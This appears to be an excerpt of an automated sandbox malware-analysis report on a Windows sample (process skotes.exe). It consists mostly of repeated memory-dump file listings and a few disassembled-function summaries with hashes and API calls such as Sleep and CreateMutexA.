Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
Instruction ID: ff5f00b53d3050c26f8af4840b67037448065602f4697a8d3e2006751e7038ec
Opcode Fuzzy Hash: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
Instruction Fuzzy Hash: 99A1D070A212469FDB21DFA5C84479AB7B8FF15310F54812AE815D7341EB31EE25CBD2

Function 0030F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0030F3A3

Strings

`'3, xrefs: 0030F375
8"3, xrefs: 0030F44B

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"3$`'3
API String ID: 3903695350-2828497434
Opcode ID: f755b7c5266a98b0910cb4416b303b9ba413cad1f6566838d2d8abc0f54e253e
Instruction ID: 2f20748f4076cc86f55224982e1562d4e89d6772637bcc2abfccd307d52a88a8
Opcode Fuzzy Hash: f755b7c5266a98b0910cb4416b303b9ba413cad1f6566838d2d8abc0f54e253e
Instruction Fuzzy Hash: CE313931602701DFEB32AA3AE865B5B73E8EF00356F11446AE449DA9D5DE74A880CB11

Analysis Process: skotes.exePID: 2836, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1941
Total number of Limit Nodes:	9

Executed Functions

Function 0043652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 00436566

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 7ae41ec13746ad7ce44155d6677d218c5bfc1e86e44b9e69500c5dd53a14d279
Instruction ID: 620aee61f76a6840da6f88e2e46618d01a4af25b97bdcc1360334e4832f827cd
Opcode Fuzzy Hash: 7ae41ec13746ad7ce44155d6677d218c5bfc1e86e44b9e69500c5dd53a14d279
Instruction Fuzzy Hash: 9AE086301411487BCF39BB19D80DD893B6AEB55744F01642AFD0946625CB29DD52C944

Function 00409BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 75a77fbf01f94f4c3edf82f754633cb1c00a8443619cf77f41ca41e6e99b1882
Instruction ID: 535a47877e23568b1e610ce02bc9bebdd176d550d2bfe1b4e3620de72211e374
Opcode Fuzzy Hash: 75a77fbf01f94f4c3edf82f754633cb1c00a8443619cf77f41ca41e6e99b1882
Instruction Fuzzy Hash: 9C313B71B042008BEB18DB68DD8979EB762EB92310F20862EE014A73D6C77D8D80875A

Function 00409F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 2918ac831b0557f005f579488a4c3ead07504bf5605ea4df7d77d8023863a1e5
Instruction ID: 03b66fc7dbcc47b8341c49ae2da239a14b27590564eddb4c87ae5e1a298fa176
Opcode Fuzzy Hash: 2918ac831b0557f005f579488a4c3ead07504bf5605ea4df7d77d8023863a1e5
Instruction Fuzzy Hash: 733125717002049BEB18DB68DD887ADB762EB86314F24862FE018E73D6D77D8990875A

Function 0040A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

